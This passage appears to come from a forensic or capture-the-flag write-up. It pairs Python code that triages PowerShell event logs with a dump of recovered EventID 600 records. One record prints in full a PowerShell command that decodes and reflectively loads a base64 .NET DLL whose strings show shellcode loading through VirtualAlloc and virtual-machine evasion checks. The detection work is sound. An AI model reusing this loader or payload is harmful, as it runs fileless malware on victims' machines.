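def decode_lenient(blob):
    """Decode base64 that may have lost its padding when the log or the dump was cut short."""
    return base64.b64decode(blob + "=" * (-len(blob) % 4))


def triage_powershell_events(xml_text):
    """One finding per EventID 600 record, flagging in-memory assembly loads and MZ payloads."""
    # evtx_dump.py declares XML 1.1; drop the declaration so a strict XML 1.0 parser accepts the rest.
    xml_text = re.sub(r"^<\?xml[^>]*\?>", "", xml_text.lstrip())
    root = ET.fromstring(xml_text)
    findings = []
    for ev in root.iter("{%s}Event" % NS["e"]):
        if ev.findtext("e:System/e:EventID", namespaces=NS) != "600":
            continue
        for s in ev.findall("e:EventData/e:Data/e:string", NS):
            if "HostApplication=" not in (s.text or ""):
                continue
            cmd = parse_fields(s.text).get("HostApplication", "")
            payloads = [decode_lenient(b) for b in B64_RE.findall(cmd)]
            findings.append({
                "record": ev.findtext("e:System/e:EventRecordID", namespaces=NS),
                "time": ev.find("e:System/e:TimeCreated", NS).get("SystemTime"),
                "host_application": cmd.splitlines()[0] if cmd else "",
                "reflective_load": "[Reflection.Assembly]::Load" in cmd,
                "embedded_pe": any(p.startswith(b"MZ") for p in payloads),
                "payload_bytes": sum(len(p) for p in payloads),
            })
    return findings


if __name__ == "__main__":
    for f in triage_powershell_events(SAMPLE_XML):
        print(f)
```

Checking the decoded blob for the MZ magic is what turns "a long base64 string" into "a PE image loaded straight from memory", which is the detection-relevant fact here: a .NET assembly that never touches disk as a file leaves this command line in the PowerShell log as its main trace.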
$ evtx_dump.py 'file.0xdb8d3f64d650.0xdb8d3f684a20.SharedCacheMap.Windows PowerShell.evtx.vacb'
<?xml version="1.1" encoding="utf-8" standalone="yes" ?>
<Events>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><Provider Name="PowerShell"></Provider>
<EventID Qualifiers="0">600</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>6</Task>
<Opcode>0</Opcode>
<Keywords>0x0080000000000000</Keywords>
<TimeCreated SystemTime="2023-03-15 19:13:58.732605"></TimeCreated>
<EventRecordID>558</EventRecordID>
<Correlation ActivityID="" RelatedActivityID=""></Correlation>
<Execution ProcessID="0" ThreadID="0"></Execution>
<Channel>Windows PowerShell</Channel>
<Computer>Galax-35</Computer>
<Security UserID=""></Security>
</System>
<EventData><Data><string>Function</string>
<string>Started</string>
<string> ProviderName=Function
NewProviderState=Started
SequenceNumber=9
HostName=ConsoleHost
HostVersion=5.1.19041.1237
HostId=82c56100-b912-47b4-a95a-1e8977d022fe
HostApplication=powershell.exe -Command
$bytes = [System.Convert]::FromBase64String("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")
$asm = [Reflection.Assembly]::Load($bytes)
$method = $asm.GetType("SecurityUpdate.Updater")
$method::run()
EngineVersion=
RunspaceId=
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=</string>
</Data>
<Binary></Binary>
</EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><Provider Name="PowerShell"></Provider>
<EventID Qualifiers="0">600</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>6</Task>
<Opcode>0</Opcode>
<Keywords>0x0080000000000000</Keywords>
<TimeCreated SystemTime="2023-03-15 19:13:58.732605"></TimeCreated>
<EventRecordID>559</EventRecordID>
<Correlation ActivityID="" RelatedActivityID=""></Correlation>
<Execution ProcessID="0" ThreadID="0"></Execution>
<Channel>Windows PowerShell</Channel>
<Computer>Galax-35</Computer>
<Security UserID=""></Security>
</System>
<EventData><Data><string>Variable</string>
<string>Started</string>
<string> ProviderName=Variable
NewProviderState=Started
SequenceNumber=11
HostName=ConsoleHost
HostVersion=5.1.19041.1237
HostId=82c56100-b912-47b4-a95a-1e8977d022fe
HostApplication=powershell.exe -Command
$bytes = [System.Convert]::FromBase64String("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WaXNpYmxlQXR0cmlidXRlAEFzc2VtYmx5VGl0bGVBdHRyaWJ1dGUAQXNzZW1ibHlUcmFkZW1hcmtBdHRyaWJ1dGUAVGFyZ2V0RnJhbWV3b3JrQXR0cmlidXRlAEFzc2VtYmx5RmlsZVZlcnNpb25BdHRyaWJ1dGUAU2VjdXJpdHlQZXJtaXNzaW9uQXR0cmlidXRlAEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBkd1NpemUAU3lzdGVtLlJ1bnRpbWUuVmVyc2lvbmluZwBGcm9tQmFzZTY0U3RyaW5nAFRvU3RyaW5nAEFzeW5jQ2FsbGJhY2sAY2FsbGJhY2sATWFyc2hhbABpc1ZpcnR1YWwAa2VybmVsMzIuZGxsAHRlc3RfZGxsLmRsbAB0ZXN0X2RsbABnZXRfSXRlbQBTeXN0ZW0AYm9vbQBTZWN1cml0eUFjdGlvbgBTeXN0ZW0uUmVmbGVjdGlvbgBNYW5hZ2VtZW50T2JqZWN0Q29sbGVjdGlvbgBSdW4AWmVybwBNYW5hZ2VtZW50T2JqZWN0U2VhcmNoZXIAVXB
kYXRlcgBHZXREZWxlZ2F0ZUZvckZ1bmN0aW9uUG9pbnRlcgBUb0xvd2VyAE1hbmFnZW1lbnRPYmplY3RFbnVtZXJhdG9yAEdldEVudW1lcmF0b3IALmN0b3IASW50UHRyAFN5c3RlbS5EaWFnbm9zdGljcwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBEZWJ1Z2dpbmdNb2RlcwBDb250YWlucwBTeXN0ZW0uU2VjdXJpdHkuUGVybWlzc2lvbnMAbHBBZGRyZXNzAE1hbmFnZW1lbnRCYXNlT2JqZWN0AG9iamVjdABmbFByb3RlY3QAR2V0AElBc3luY1Jlc3VsdAByZXN1bHQAVG9VcHBlckludmFyaWFudABTeXN0ZW0uTWFuYWdlbWVudABnZXRfQ3VycmVudABDb252ZXJ0AE1vdmVOZXh0AENvcHkAb3BfRXF1YWxpdHkAU3lzdGVtLlNlY3VyaXR5AAAAkXk2AHcARABvAFkAdwBZAEEAQQBPAHMAQQBZAEQASQBYAEcAcwBmAEIAUgBnAGIAWgBHADgARQAvAGsAdwBBAEEAVQBBAEIARgBNAEIAUQBPAFIAUQBJAFUARAB1AEwAMgBKADgAdwBxADgAOQBNAHoARwBSADgAZgBuADgAdwA3AGUARgB2AFoAeAArAHkASgBjAEEAYQBDAEsAZgAwAGwAcABXAFYAQgBVADEATgBUADAAdAByAE0AeABZAEIANgBiAEcARgA3AFkAZABmAGsATgBCAEQAaAAxAHcAdQBlAEIATAB2AEYASQBmADYAUQBxAG0AegB1AEIASABxAFEAbwByAGgASABaADMAdABQAE8AaQBQAFMAYwBpAEYAcwA4AFUAWQBPAGwALwA2ADIASgBtAEsAbABIAHcAOAA1AGUATQBsAG8ATgBRAFUAUgAzAC8AWgBSADgAeABQAFoANQBnACsASwB3ADcANgBhAEYAZQBNADcAdQBKAG4AdABaAGQAawBjAHkAdQBYAEwANAAvADgAaQBrAEkARgBYAGcAcAAxAFUAYgBnAEYAMQBIAHkAaQAwAEYAUQBoAHIAVABLAFMAOQBIAGwAaABQAEYAZgBJADMASABWADMATQBtAEEAdQA3AEIAbgBuADUAdQAzAG0AcgB6AE8ARgBPAEYANQBYAGUAWQArAGwAQwBOAEkAaABLAFcAeAB4AHcATgBZAEIAaABWAHAAMgBVAFcAdABHAFQAeQAzADYAUAA3ADEARgBLAGMAVwBNAGYAaABCAGUAWAAwAHgANgBOAG4AdwB2AEYAdABqADYAQwArAFAAdgBsAEEAUgBEAFMAZgBjAGsAWQBTAFIATABNAFoAbQBsAGgAdwB4AFMAYgAwAFYAcwB6AGEAdABMAEMASgA5AHIAZwBWAGwAUgBYAGcAeABXAEsAMABBAGIAaQB0AG8AMABRAFUATwAyAFUAOQA2AHYAcABBAG4AMwBYAEsAVQAxAC8AagBtAGQAdQBFAHkAawBxADQAcwBtAEUANABQAEsASwBtAGIAdgBhAGIASwA5AEwAeQB6AFAAcgBQADMAOQBYAGIAegB1AGYAVQBpAEQAQwBlADkAYgBEAHYAOQBvAFkATgBkAEUATwB4AFgAcAA0AGwASABxAHQAagByAFoAdQBQAHMANgBQAGEAbQBBAGEAUAB5ADIAVgB0AFAAQgBMAHAAVwBYAGwAUgBPADMAOABoAHgAcwByAG4AWAB0AEgAbgAyAGEAbgBsAGYASgBCAFkAbABwAEMAbgBDAFIASgBQAHcAMgB2AE8AVABOAGgANABKAEYAeAA2AGUATQBWAGgAZABYAEQAegBtAEQAQwBlAFQAUABOAE4ASQA0ADQATQBsAC8ASwBQAEsAZAAwAFoAawBaAHYAbgB3AFAANAA3ADkANgAxAHYAUwBpAFo
AaAA4AFYAaQBHAEUAbwBwAC8ASQByAHoAQgBWAEoAbwBhAGwAYgBLAFgAKwBZAEgATwBJADcAdgBNAG4ASwBHAFMAVAA0AFUAdABsAHYANgBhAEIAMABuAE4AOAA0AGQASgBWAFEAdgB1AC8AQwBHAEsASgBNAFAAVABxAEIAaQBPAEQAcwBlAGoAQQBiADQAOAByADAAbwBBAFQAcwBsAHMAagBrAFoAMQAxAFkAdAAyAC8AYgByAGIAMgBnAGEAbgB0ADkAVwBkAGMAawBVAHAATABpAFAANwBCAEUAQQBtAGMAMwBUAFYAMwBiAFAAQgB4ADUASgBNAHMASwA4AGQANgB2AFQATABqAEkAZgBNAGMATAA5AC8AWgB4AHIAaAAvACsAcgBLAEUAVAB4AE4AYgBqAGYAdQBxAFQAeQA5AHoALwAxAGEALwBWAEgAMgBJAEkAQgBWAFEAZgBTAGgAVABKAG4AMgBxAHEASAA3AHoAMgBhAFcAbwB1AGYAbgBHAFEAUABQAEkATgA4AHAATAA1AEEAYgBHADkASQBVAG8AWgBVADUAKwBLAEIAbABSAE8AaQBCAEYAVgB1AEEAcwB2AGwAMAA0AGcAUQBzADkAUgBlAEUAVQBHAHQANgBYAFoAdAB2AFAANABtAEEAZQAwAHQAbwAzAEYAeAAwAHUATgBEAEcAbABkAGwAegBNAFkAWABsAG4AVwBpADYAYgBTAEUAQQBuAGoAKwBaADIAegAwADcAZQBHADgANwBUAHMATgAzAGQAYgBRADMAeQAwAG4ATwB1ADUAdgB5AC8AeQBSAGUAWQBuAHIARgBpAE4ASwA2AGQAbAAzADEAVwB1AGMAKwAvAFUAQwBLAE4AcwBlAHEATwAwADEARwBJACsATgBQADUAbgB6AFkAbABWAC8AOAB6AHYANgBOAC8AcABuAG0AYwBOADIAOABBAGIAcAB1ADIASQBwAEoAZQA2ADYAagBXAFkASwBCAHUANQBlAFIAWABiAEcAawBlAE0AYwBUAFIAbgBuAGgAMwBXAEcARQAwAHAAUgB6AHoAbQBEAEsAMgBrADgAeQBiADYAMABwAFMAVwArAFYAVQArAFIARwA1ADUAOAA0AHgAaABPAFcAZQBxAFkANABsAFMAcwA1AGIAYgBYAEwAdgB4AGwAQgBxAEsAZAB6ADUAVgBMAEUAZABIAHUAdAAwAFMAaQBVAHQAagBFAEcASABBAEgAbwBOADgAMgBZADEAWABQAHcANQAvAFkARQBtADgASAB2AFQAZgBWAEMAcQBFAEoAUQBnADEAZAA2AFgAbwBBAEgAOAB6AGUAbQB3AEgANgBOAHcAMQBwAC8AVABrADYASAAwAC8ARABLAFEAcQA1AGEAQwBsADMASgBXADkAZgBGAGkALwBPAGEAcAA2AHQANgAzAEQAUABTADAAeQBhAHcAQwBMAGoAcwBKAFAAZwA5AHAAYgBrADAAdABJAHYAUwBkAHcASgBLAHcAVABSADEAcwBuAGUAcgBKAHcAMwBRAFYAMQAxAEkAegBWAEMAbABWAGUATQBCAGsAeAByADkAZQBqAHYAbgBmAHEATAAyAEgAUAAwADUAZwBwAGkAMQBnAHkASAB6AHQAdAA1AGoALwBmAHAAMABlAG8ANQA3AFAATwA3ADkASAB5AGwATwBqAFMATgBMAHoAMQA2AGoAcwA3AG0ANABPAEwAVAAwAG4AcwBRAHYAYwBzAGgARABLAGoAdgBPAHEAUwBnAFgAWABlAHEAWgBwAFQAMwBiAGYAYgBoAFoAYgBMACsAQgBEAHEAWQBkAE4AWABrAEwAZwBNAGoAQwBBAHYATwB2AGgAcgBlAHoAcQB2AEoATwBsAGoAdgBMAGwALwBhAEcAdQBDAFkAZQB5AEIAbABmAFEAdQBkADQAbgBrADgAawBNAFEAUABKAFYAeABlAHMAZwBxAHQANQBKAGkAZgBDAFQ
AUgBOAHIARQBzADUAYgBvAE8AMwBxAHIAWgBCAGYAbwBSAG0ARgBFAGIAdQBOAGIAYwBLAE4AYQBKAEcANwBCAGwAUgBzAEoAQwA2AG4AdwBZAGQAbQBrAFIAVgBHAGUAZAAvAHAAVwBqAEcAVABRAHcAUABVAEEARQBSAHoAYgBTAG8ASQBWAE4ATAAzAGcAcgBOAGMAVwAxADcAUwBPAGYAbABlAHMAeQArAGkAeAB0AHgANwBIAEkAYgBOAHQAcwBNAGIAaABpAGcANgBwAGEAdABSAGsAMwA1ADMATQBhADAAdQBkADgARABsAHIAaQBNAE4AWQBNAFUARwArAHkAcABWAEUATQB4AG4AOQBYAHoAYwAzAEQASwBoAHMARgBLAE8AMgA3AEoAbgB3AGcAOABVAHQAaABRADIAWgAzACsAYQBOAEYAeQBrAEwAeABFAFIASABtAE4AYQBSAFoAcABSAEoAKwBSAFgAMQBNAFcAdgA3AGkAbAA1AFcAdABqADIASQBhAHQARgA2AGwASQBzAEIAdQBtADkATgBOADUAOQBmAFQANgBPAFYAbQBMAGcAbQBDAGUAbwBXAHUASQBJAEIAagBUAHIAVAB4AFYALwAvAEkAMwB2AG4AVgAwAHcAdgBnAFcAMQB2AEkAVwAzAGQAagBRAFQAdwBXAG4AYgBZADUAagBWAHAAOQBkAEkAWQB2AHoAYgBUAEkAdgBrAFQANgBQAGkAZABkADYATQBwAGMAcQBzAEYAaAAwAFAAeABnAFgASQBOAEMAZwBkAHAASQBZADYATABmAG0AdABPAEcAVQBRAHIAUgA0AFkAawBjAEMAZwBXAHkAMAB6AHYAQwB1AEIAKwB2AFcAZAB5AGMAegBNAGsAcABaAHgAKwBlAFkAcwBQAG8AbgBYAHgAcQBQAHUAWgBNAEYANABXAGMASQA5AEgARQA4ADQAZwBWAGMAQgBzAE8ANQBJAGUAaABsAE0ASAB5ADEAdgBlAEkAWABvAGUAUwBHADYAWABRAGcAbgB5ADEANQBLAHYARABMAFkAZgB1AFMAZABFAHMAMQBZADcARQB6AC8AagBuAGEAZQBVAFoAQwBHAHMATQByAGYAQQArAHQANABCAHkAZABBAFMAVgBVAG8ASwBIAHcASgBPAHcAcABjADUAeABJAFoAbQBrAHYAbwBmAEYAegArAGYAQwBYAFIAMgA0AHIAZgBEAGQAUgBoAGYATgBJAG0AZgBqAFQANQAwAGgARwBJAHIAcwBIAGoAegB4ADYAdgBnAE8AMwBoAGUAWQBjAG0ASABQAGYAdwBIAFYAZABYAG0ARgA4AEMAZABxAHEAcQBBAGwATgAvADQAKwAvAHUAcABkAE8AOAA0AHQARQB3ADEARQBpAGIAdgBhAEoAQgAvAGwAdgBGAGMANABiAFIAaQBoAFcAcwAyAFoASABJAHMAVwB0ADQAYgB1AEsAYwBFAGwANgB2AGsAMgBhAG4AZwBvADUAOABmAEgAYQBtAFAAVQBPAEkAWAByAEEAbwBmAEUANwAyADQAZQBoAHkAaABWAEIASQBzAEIASQBRADkASQBKAE8ASgA1AFEAMAB2AHcATABJAFgAMABNADQAVgBMAGYAUABxAGgAdABLAEkAQgBSAFUAbQBKAFoAYQBaAEQAbwBiAEkAOQBuADEATwAzAGYAQwBnAGcAQgA3AGkAcgBDAEcAWABOAGcAZgB2AHEASABOAHMARgBJAFEANgB6AGsARwBzAGUAcQArAFIARAAyAHoAVABlACsAaQBuAFIAZQBCAG8ANwBWAGoAdwB0AEMAWQBIAGkAWABUAEgAUQBKAFgAbQBMADkAKwBuAE8AWQBBAEgARwBOAGoAagBwAEYAVABrADYANQByAHIALwBHAEkAWgBEADQAagAyAHcANQBsAGUATABlADEAMABSAFoAbwBqAGEAYgB3AGcASwBaAG0AdAA4AFY
ARQBFAGYANgAwAEkAdwBGAGgAMgBOADgASABZACsAagB5AFkAWQBaAFIANQBvAGwAZwB6AGUASwBNAGYARQB2AEIAcwA5AEUAcwBvAFMAYgB6AEsANgBzADAAMQBaAFoAMQBjADIAdABmAC8AUwBaACsAbAAvADUAbQBrAFoAZQBIAGYASQBXADcATABqAFQAdQBYAEkAdgBrAGQAcQArAFYAaQBzADUAbgBJAHAAMABoAGQAVwBGADcAcABJAG0AYQBCAFAALwA5ADcAUwBwADcAdwBQADMAbQA1AEkANwBlAFAAVwBqAEUAOQAvAFkASQAwACsAawBJAG0ATQBhAFgASQBoAGkAbwAxAG8AVQA4AHAAdgBTAEEAawBGAGEANgB3AEIAQgBnAFcAbwBDAEgANABCAFYAMABVAEgAQgBRAGcAYQBBAFEAWQBGAHEAQwB0AGsAYgBkAGIASgBCAHcAVQBvAE8AWABFAEYAUwB3AHcAPQA9AABFUwBlAGwAZQBjAHQAIAAqACAAZgByAG8AbQAgAFcAaQBuADMAMgBfAEMAbwBtAHAAdQB0AGUAcgBTAHkAcwB0AGUAbQAAGU0AYQBuAHUAZgBhAGMAdAB1AHIAZQByAAArbQBpAGMAcgBvAHMAbwBmAHQAIABjAG8AcgBwAG8AcgBhAHQAaQBvAG4AAAtNAG8AZABlAGwAAA9WAEkAUgBUAFUAQQBMAAANdgBtAHcAYQByAGUAABVWAGkAcgB0AHUAYQBsAEIAbwB4AABaEe4i3DbMTbmi39FxP8FyAAQgAQEIAyAAAQUgAQEREQQgAQEOBCABAQIFIAEBEUEDBwECBwcDHQUYEgwFAAEdBQ4CBhgIAAQBHQUIGAgGAAESeRF9CAACEoCBGBJ5DQcHElESVRJZEl0OAgIEIAASVQQgABJZBCAAEl0EIAEcDgMgAA4FAAICDg4EIAECDgMgAAIIt3pcVhk04IkIsD9ffxHVCjqAni4BgIRTeXN0ZW0uU2VjdXJpdHkuUGVybWlzc2lvbnMuU2VjdXJpdHlQZXJtaXNzaW9uQXR0cmlidXRlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkVAVQCEFNraXBWZXJpZml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")
$asm = [Reflection.Assembly]::Load($bytes)
$method = $asm.GetType("SecurityUpdate.Updater")
$method::run()
EngineVersion=
RunspaceId=
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=</string>
</Data>
<Binary></Binary>
</EventData>
</Event>
...
